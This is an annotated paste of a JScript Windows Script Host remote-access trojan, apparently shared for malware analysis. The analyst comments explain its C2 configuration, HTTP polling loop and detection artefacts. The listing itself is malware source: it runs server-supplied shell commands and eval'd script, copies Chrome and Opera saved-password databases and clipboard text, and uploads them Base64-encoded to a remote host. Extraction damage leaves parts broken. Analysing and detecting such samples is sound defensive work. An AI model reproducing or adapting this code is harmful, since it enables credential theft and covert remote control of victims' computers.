James_inthe_box

Hworma

Dec 10th, 2019
  // Analyst note: configuration values and shared COM objects for a Windows Script Host (JScript) sample.
  // The listing is extraction-damaged (the fog32 literal below is cut off), so treat it as evidence, not runnable code.
  1. // ------------ Config --------------- //
  // dyn74 is the host part of the URL built in oju28. NOTE(review): a bare integer host may be a
  // decimal-encoded IPv4 address - confirm against the original sample before using it as an indicator.
  2. var dyn74 = '100613900'
  // yng97 is the TCP port placed in that same URL.
  3. var yng97 = 87
  // bgb15 is the working/install directory; it is expanded to a real path further down.
  4. var bgb15 = '%ProgramData%'
  // lwx52 is passed to WScript.sleep() in the main loop, i.e. the poll interval in milliseconds.
  5. var lwx52 = 300
  6. // ------------ public var ----------- //
  // COM objects reused by every function: shell (process launch, registry, environment), file system,
  // HTTP client, and WinNTSystemInfo (read for UserName in yst77).
  7. var wch74 = WScript.CreateObject('WScript.Shell')
  8. var ftx16 = WScript.CreateObject('scripting.filesystemobject')
  9. var pcv92 = WScript.CreateObject('msxml2.xmlhttp')
  10. var syc31 = WScript.CreateObject('WinNTSystemInfo')
  11. // ------------ private var ----------- //
  // vqs72 is the standard Base64 alphabet; nothing in the visible listing references it.
  12. var vqs72 = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
  // rjb74 is the script's own file name; it is reused as the name of the copy made by yhp97.
  13. var rjb74 = WScript.scriptname
  // eua22 resolves the per-user Startup folder. It is not used anywhere else in the visible listing;
  // whether lines that used it were lost in extraction cannot be told from here.
  14. var eua22 = wch74.specialfolders('Startup') + '\\'
  15. var bgb15 = wch74.expandenvironmentstrings(bgb15) + '\\'
  // fog32 is the field delimiter used both to split server responses and to join the host fingerprint.
  // Its literal is truncated here, so the real delimiter value is not recoverable from this page.
  16. var fog32 = '<
  17. var wnd98,ijo62,bhw07
  18. // ------------ Code Start ------------ //
  // Main flow: one environment check, a self-copy, then an endless poll-and-dispatch loop.
  // The `do {` / `try {` openers and the switch braces are missing from this listing; the closing
  // `}catch(ult43){}` and `}while(true)` at the end of this block show the intended shape.
  // Defender view: the command names and reply tags below are distinctive static strings, and the
  // behaviour is wscript/cscript making repeated HTTP POSTs and launching cmd.exe.
  19. // check -- antvrs on
  // Quits when qbp14() (the C: volume serial number) equals this one fixed value.
  // NOTE(review): presumably excludes one specific machine - the listing does not say which.
  20. if(qbp14() == "88FDB972"){WScript.Quit(0)}
  21. // check -- antvrs off
  // Copies the running script into the install directory (see yhp97).
  22. yhp97()
  23. wnd98 = ''
  // Poll: POST to the '/is-bekle' path with an empty body. The response text is split on fog32;
  // field 0 selects the command and the remaining fields are its arguments.
  24. wnd98 = oju28 ('is-bekle','')
  25. ijo62 = wnd98.split(fog32)
  // No `break` statements are visible between the cases; whether the original had them is unknown.
  26. switch(ijo62[0])
  // 'Sleep': the server sets the poll interval.
  27. case 'Sleep':
  28. lwx52 = ijo62[1]
  // 'readtext': returns the contents of a server-named file as text.
  29. case 'readtext':
  30. oju28('txtfile',bjw54(ijo62[1]))
  // 'downfile': returns a server-named file Base64-encoded (acu36), tagged 'BcorpFile'.
  31. case 'downfile':
  32. oju28('filetransfer','BcorpFile' + acu36(ijo62[1]))
  // 'upfile': runs a cmd.exe command line assembled from server-supplied fields plus the configured
  // host and an '/a/' path. NOTE(review): presumably a fetch-to-disk command; field 1 is not shown.
  33. case 'upfile':
  34. sbx61(ijo62[1] + dyn74 + '/a/' + ijo62[3] + ' ' + ijo62[2] + ijo62[3])
  35. case 'clip-board':
  36. oju28('is-clip',krf52())
  // 'excecute' / 'PlanB': run a server-supplied command line, hidden via cmd.exe or in a normal window.
  37. case 'excecute':
  38. sbx61(ijo62[1])
  39. case 'PlanB':
  40. pmv64(ijo62[1])
  // 'GetPass': copies and uploads browser 'Login Data' files (see tfi63).
  41. case 'GetPass':
  42. tfi63()
  // 'KeyMe': uploads 'store.txt' from the install directory, tagged 'BcorpKey'. Nothing in the visible
  // listing writes that file. NOTE(review): presumably produced by a separate component - unconfirmed.
  43. case 'KeyMe':
  44. oju28('My-Keys','BcorpKey' + bjw54(bgb15 + 'store.txt'))
  // 'enum-*': host reconnaissance - drives, folder contents, running processes.
  45. case 'enum-driver':
  46. oju28('is-enum-driver',kpb62())
  47. case 'enum-faf':
  48. oju28('is-enum-faf',nio87(ijo62[1]))
  49. case 'enum-process':
  50. oju28('is-enum-process',neu62())
  // 'komutcu' / 'komutcu2': run a command and return its output, via Exec pipes or via a redirect to
  // 'brat.tmp' in the install directory, which is deleted afterwards.
  51. case 'komutcu':
  52. oju28('komutcu',wja82(ijo62[1]))
  53. case 'komutcu2':
  54. oju28('komutcu',bmg86(ijo62[1]))
  55. kmb95(bgb15+'brat.tmp')
  56. case 'screen-send':
  57. egh31(ijo62[1])
  58. case 'delete':
  59. kmb95(ijo62[1])
  60. case 'exit-process':
  61. apf52(ijo62[1])
  62. default:
  // 'js-text': eval() of a server-supplied string, i.e. arbitrary script execution inside the host
  // process with no validation. This makes the visible command list a lower bound on capability.
  63. case 'js-text':
  64. eval(ijo62[1])
  // 'vbs-text': calls Exec(), which is not defined anywhere in the visible listing.
  65. case 'vbs-text':
  66. Exec(ijo62[1])
  67. case 'message':
  68. fxj92(ijo62[1])
  69. case 'RenFile':
  70. baa88(ijo62[1],ijo62[2])
  // 'dizinver': the server relocates the working directory used for staging files.
  71. case 'dizinver':
  72. bgb15 = wch74.expandenvironmentstrings(ijo62[1]) + '\\'
  // Sleeps lwx52 ms between polls. The empty catch swallows every error, so a failed request or
  // handler just falls through to the next iteration.
  73. }WScript.sleep(lwx52)
  74. }catch(ult43){}
  75. }while(true)
  // yhp97: copies the running script file to <install dir>\<script name> (bgb15 + rjb74).
  // Only the copy is visible; no autorun or Startup-folder write appears in this listing, and the
  // closing brace is missing. Defender view: a script file appearing under %ProgramData% written by
  // wscript/cscript is the on-disk artefact of this step.
  76. function yhp97(){
  77. ftx16.CopyFile (WScript.scriptfullname,bgb15 + rjb74)
  // oju28(path, body): the single network primitive. Sends a synchronous (third open() argument is
  // false) HTTP POST to http://<dyn74>:<yng97>/<path> and returns the response text.
  // The parameter names shadow the globals ijo62/bhw07. The function braces are missing in this listing.
  // Defender view: plain HTTP to a non-standard port, with the host fingerprint from yst77() sent in a
  // header whose name is literally 'user-agent:' (trailing colon included) on every request.
  78. function oju28(ijo62,bhw07)
  79. pcv92['open']('POST', 'http://' + dyn74 + ':' + yng97 + '/' + ijo62, false)
  80. pcv92.setRequestHeader('user-agent:', yst77())
  81. pcv92['send'](bhw07)
  82. var xjc97 = pcv92['responsetext']
  83. return xjc97
  // yst77: builds the host fingerprint string sent as a request header by oju28.
  // Fields, each followed by the fog32 delimiter, in order: C: volume serial, user name, OS caption and
  // architecture, script file name, antivirus display name (or 'Err'), install directory, a .NET 2.0
  // flag, the literal 'C', the poll interval, the literal 'J'.
  // Several `try{` openers and closing braces are missing from this listing.
  84. function yst77()
  85. var glb39,pks30,swc22,ury87,kpc44
  86. glb39 = qbp14() + fog32
  87. glb39 = glb39 + syc31.UserName + fog32
  // WMI query for OS details. The operator between 0x10 and 0x20 was lost in extraction.
  // NOTE(review): presumably a bitwise OR of two WMI query flags - confirm against the sample.
  88. var luq53 = GetObject('winmgmts:\\\\.\\root\\CIMV2')
  89. var fjn56 = luq53.ExecQuery('SELECT * FROM Win32_OperatingSystem', 'WQL', 0x10
  90. 0x20)
  91. var urf75 = new Enumerator(fjn56)
  92. var ucq81 = urf75.item()
  93. ury87 = ucq81.Caption +' '+ ucq81.OSArchitecture
  // kpc44 (SystemDrive) is read but never added to the fingerprint in the visible lines.
  94. kpc44 = ucq81.SystemDrive
  // Reads the first registered antivirus product from the securitycenter2 WMI namespace.
  // Defender view: a script host querying 'antivirusproduct' is a useful WMI-activity signal.
  95. var bfs28 = GetObject('winmgmts:\\\\localhost\\root\\securitycenter2')
  96. var hkk63 = bfs28.ExecQuery('select * from antivirusproduct','WQL', 0)
  97. var hhc18 = new Enumerator(hkk63)
  98. var jem99 = hhc18.item()
  99. pks30 = jem99.displayname
  // Any failure in the antivirus lookup is reported to the server as 'Err'.
  100. }catch(ezp32){pks30 = 'Err'
  // Registry read used as a .NET Framework 2.0 presence check; '-' on failure, 'True' on the expected value.
  101. try{swc22 = wch74.RegRead('HKLM\\SOFTWARE\\Microsoft\\.NETFramework\\Policy\\v2.0\\50727')
  102. }catch(ezp32){swc22 = '-'
  103. if(swc22 == '50727-50727'){swc22 = 'True'}
  104. glb39 = glb39 + ury87 + fog32
  105. glb39 = glb39 + rjb74 + fog32
  106. glb39 = glb39 + pks30 + fog32
  107. glb39 = glb39 + bgb15 + fog32
  108. glb39 = glb39 + swc22 + fog32
  // 'C' and 'J' are fixed markers; their meaning to the server is not shown in this listing.
  109. glb39 = glb39 + 'C' + fog32
  110. glb39 = glb39 + lwx52 + fog32
  111. glb39 = glb39 + 'J' + fog32
  112. return glb39
  // qbp14: returns the VolumeSerialNumber of logical disk C: obtained through WMI. The value serves as
  // the host identifier (first fingerprint field) and is compared with a fixed serial in the main flow.
  // As listed, luq53 and jem99 are used without being defined in this function.
  // NOTE(review): presumably a GetObject(...) line and an item() line were lost in extraction.
  113. function qbp14(){
  114. var njo83 = luq53.ExecQuery("SELECT * FROM Win32_LogicalDisk Where DeviceID = 'C:'")
  115. var hhc18 = new Enumerator(njo83)
  116. var uxx34 = jem99.VolumeSerialNumber
  117. return uxx34
  // sbx61(cmd): runs 'cmd.exe /c <cmd>' through WScript.Shell Run with window style 0 (hidden).
  // The argument is concatenated unquoted and unvalidated, and errors are swallowed by the empty catch
  // (its `try{` opener is missing from this listing).
  // Defender view: a wscript/cscript parent spawning a hidden cmd.exe child is the process-tree signal.
  118. function sbx61(dul72)
  119. wch74['run']('cmd.exe /c '+dul72,0)
  120. catch(ult43){}
  // pmv64(cmd): runs the given command line directly through WScript.Shell Run with window style 1
  // (normal, visible window), without the cmd.exe wrapper that sbx61 adds. Braces are missing here.
  121. function pmv64(dul72)
  122. wch74.Run(dul72,1)
  // fxj92(text): shows a WScript.Shell Popup dialog containing the given text on the user's desktop.
  // Reached from the 'message' command, so the text comes from the server.
  123. function fxj92(dul72)
  124. wch74.Popup(dul72)
  // kpb62: enumerates the file system object's Drives collection and returns 'BcorpDriver' followed by
  // one record per drive built from DriveLetter, ':' and DriveType, each terminated by fog32.
  // The `for(;!` loop header and the separator literal between letter and type are damaged in this
  // listing (the string is split across two lines), so the exact record format is not recoverable.
  125. function kpb62()
  126. var s, n, e, d
  127. e = new Enumerator(ftx16.Drives)
  128. s = ''
  129. e.atEnd()
  130. e.moveNext())
  131. { d = e.item()
  132. s = s + d.DriveLetter+':'+'
  133. '+d.DriveType+fog32
  134. return('BcorpDriver' + s)
  // nio87(folder): lists a server-named folder. Sub-folders are appended to s with a 'd' marker, files
  // are appended to s1 with their size and an 'f' marker; the result is 'BcorpFaf' + s + s1.
  // s1 is assigned without `var` (not in the declaration list), and s is never initialised in the
  // visible lines. The loop headers and the separator literals are damaged by extraction.
  135. function nio87(dul72)
  136. var fs, f, fc, s, fc1
  137. s1 = ''
  138. fs = new ActiveXObject('Scripting.FileSystemObject')
  139. f = fs.GetFolder(dul72+'\\')
  140. fc = new Enumerator(f.SubFolders)
  141. fc.atEnd()
  142. fc.moveNext())
  143. s += fc.item()
  144. s += '
  145. '+''+'
  146. '+'d'+'
  147. '+fog32
  148. fc1 = new Enumerator(f.files)
  149. fc1.atEnd()
  150. fc1.moveNext())
  151. s1 += fc1.item()
  152. s1 += '
  153. '+fc1.item(0).size+'
  154. '+'f'+'
  155. return('BcorpFaf'+s+s1)
  // neu62: enumerates Win32_Process instances through WMI and returns 'BcorpProccess' followed by one
  // record per process holding Name, ProcessID and ExecutablePath, each terminated by fog32.
  // gli28 is assigned without `var`. The for-loop header and separator literals are damaged here.
  // Defender view: exposes the full process list, including any security tooling, to the server.
  156. function neu62()
  157. var npf82 = GetObject('WinMgmts:').InstancesOf('Win32_Process')
  158. var pos85 = ''
  159. gli28 = new Enumerator(npf82)
  160. for (
  161. gli28.atEnd()
  162. gli28.moveNext())
  163. var waa83 = gli28.item()
  164. pos85 += waa83.Name + '
  165. ' + waa83.ProcessID + '
  166. ' + waa83.ExecutablePath + fog32
  167. return('BcorpProccess' + pos85)
  // ekr13(execObj): helper for wja82. Reads lines from the StdOut and StdErr streams of an Exec object
  // and joins them with the literal '<Satir>' marker, returning the combined text.
  // The loop conditions are fragmented in this listing, so the exact read order cannot be confirmed.
  168. function ekr13(oyg46)
  169. var wup34 = ''
  170. wup34 = wup34 + oyg46.StdOut.Readline() + '<Satir>'
  171. while(
  172. oyg46.StdOut.AtEndOfStream)
  173. wup34 = wup34 + oyg46.StdErr.Readline() + '<Satir>'
  174. oyg46.StdErr.AtEndOfStream)
  175. return(wup34)
  // wja82(cmd): runs '%comspec% /c <cmd>' through WScript.Shell Exec, polls Status once per second
  // while it is 0, collects the output through ekr13, and returns it prefixed with 'BcorpCmd1'.
  // The comparison around `= -1` is damaged in this listing, and the closing braces are missing.
  176. function wja82(dul72) {
  177. var oyg46 = wch74.Exec('%comspec% /c ' + dul72)
  178. while (oyg46.Status == 0)
  179. WScript.Sleep(1000)
  180. var vfl33
  181. while ( (vfl33 = ekr13(oyg46))
  182. = -1) {
  183. return('BcorpCmd1'+vfl33)
  // bmg86(cmd): runs the command hidden (window style 0) with its output redirected to 'brat.tmp' in
  // the install directory, waits one second, then returns the file contents prefixed with 'BcorpCmd2'.
  // The '%com'+'spec%' split only breaks up the literal in the source; it concatenates to '%comspec%'.
  // Defender view: a short-lived 'brat.tmp' written by cmd.exe under the install directory.
  184. function bmg86(dul72) {
  185. wch74['run']('%com'+'spec% /c '+dul72+' > '+bgb15+'brat.tmp',0)
  186. WScript.sleep(1000)
  187. return('BcorpCmd2'+bjw54(bgb15+'brat.tmp'))
  // bjw54(path): opens the file for reading (mode 1) and returns its entire contents as text.
  // The third argument `true` makes OpenTextFile create the file when it does not exist, so reading a
  // missing path leaves an empty file behind. The handle is not closed in the visible lines.
  188. function bjw54(spo66) {
  189. var fp1 = ftx16.OpenTextFile(spo66, 1, true)
  190. return fp1.ReadAll()
  // baa88(oldname, newname): renames a file by passing 'ren <old> <new>' to sbx61, i.e. a hidden
  // cmd.exe. Both names are server-supplied and concatenated without quoting.
  191. function baa88(oldname,newname) {
  192. sbx61('ren ' + oldname + ' ' + newname)
  // kmb95(path): calls DeleteFile and then DeleteFolder on the same path through the file system
  // object. Used for server-requested deletion and to remove the 'brat.tmp' staging file.
  // NOTE(review): presumably each call sat in its own try/catch; no error handling survives here.
  193. function kmb95(dul72)
  194. ftx16.DeleteFile(dul72)
  195. ftx16.DeleteFolder(dul72)
  // krf52: reads the clipboard as text by instantiating the 'htmlfile' ActiveX object and calling
  // clipboardData.getData('text'); returns the text prefixed with 'BcorpClip'.
  // Defender view: clipboard contents (which may hold copied credentials) leave the host on request.
  196. function krf52()
  197. var hqu92 = new ActiveXObject('htmlfile').parentWindow.clipboardData.getData('text')
  198. return('BcorpClip'+hqu92)
  // tfi63: handler for the 'GetPass' command. For Chrome and Opera it checks whether the profile's
  // 'Login Data' file exists, copies it into the install directory (ChDb.sql / OpDb.sql) through a
  // hidden cmd.exe, and uploads the copy Base64-encoded with the tag 'BcorpPassCh' or 'BcorpPassOp'.
  // Closing braces for both `if` blocks are missing from this listing.
  // Defender view: a non-browser process reading 'Login Data', and the two .sql staging files, are
  // the artefacts; the staged copies are not deleted in the visible lines.
  199. function tfi63()
  // er0 is an empty function in this listing, so this call has no visible effect.
  200. er0('filetransfer','BcorpPassCh')
  201. if (ftx16.FileExists(wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data'))
  202. {sbx61('copy "' + wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"' + ' ' + bgb15 + 'ChDb.sql')
  // Short pause before reading the copy; sbx61 does not wait for cmd.exe to finish.
  203. WScript.Sleep(500)
  204. oju28('filetransfer','BcorpPassCh' + acu36(bgb15 + 'ChDb.sql'))
  205. if (ftx16.FileExists(wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data'))
  206. {sbx61('copy "' + wch74.expandenvironmentstrings('%userprofile%') + '\\AppData\\Roaming\\Opera Software\\Opera Stable\\Login Data"' + ' ' + bgb15 + 'OpDb.sql')
  207. oju28('filetransfer','BcorpPassOp' + acu36(bgb15 + 'OpDb.sql'))
  // apf52(pid): force-terminates a process and its child processes with 'taskkill /F /T /PID <pid>',
  // run through sbx61 (hidden cmd.exe). The PID is server-supplied and not validated.
  208. function apf52(dul72)
  209. sbx61('taskkill /F /T /PID ' + dul72)
  // acu36(path): reads a file as binary through ADODB.Stream (Type = 1), converts it to Base64 using
  // an XMLDOM element with dataType 'bin.base64', and returns the text after a regex replace.
  // This is the encoder behind every 'filetransfer' upload. The stream is not closed in the visible lines.
  210. function acu36(pepe) {
  211. var rfx48 = new ActiveXObject('ADODB.Stream')
  212. rfx48.Open()
  213. rfx48.Type = 1
  214. rfx48.LoadFromFile(pepe)
  215. var wes77 = rfx48.Read()
  216. var hym47 = new ActiveXObject('Microsoft.XMLDOM')
  217. var fbs41 = hym47.createElement('tmp')
  218. fbs41.dataType = 'bin.base64'
  219. fbs41.nodeTypedValue = wes77
  // The character class is split across two lines by extraction. NOTE(review): presumably it began
  // with a negation so that only non-Base64 characters (line breaks) are stripped - unconfirmed.
  220. return(fbs41.text.replace(/[
  221. A-Z\d+=\/]/gi, ''))
  // egh31(pori): handler for 'screen-send'. Uploads 'kukuri.bmp' from the install directory
  // Base64-encoded with the tag 'BcorpImage', waits 400 ms, then posts to the 'transfercomplate' path.
  // The parameter is unused in the visible lines, and nothing in this listing creates the bitmap.
  // NOTE(review): presumably the capture step was lost in extraction or lives in another component.
  222. function egh31(pori)
  223. oju28('filetransfer','BcorpImage' + acu36(bgb15 + 'kukuri.bmp'))
  224. WScript.Sleep(400)
  225. oju28('transfercomplate')
  // er0: takes no declared parameters and contains only an empty try/catch, so as listed it does
  // nothing. tfi63 calls it with two arguments, which are ignored.
  226. function er0()
  227. {try{}catch(O){}}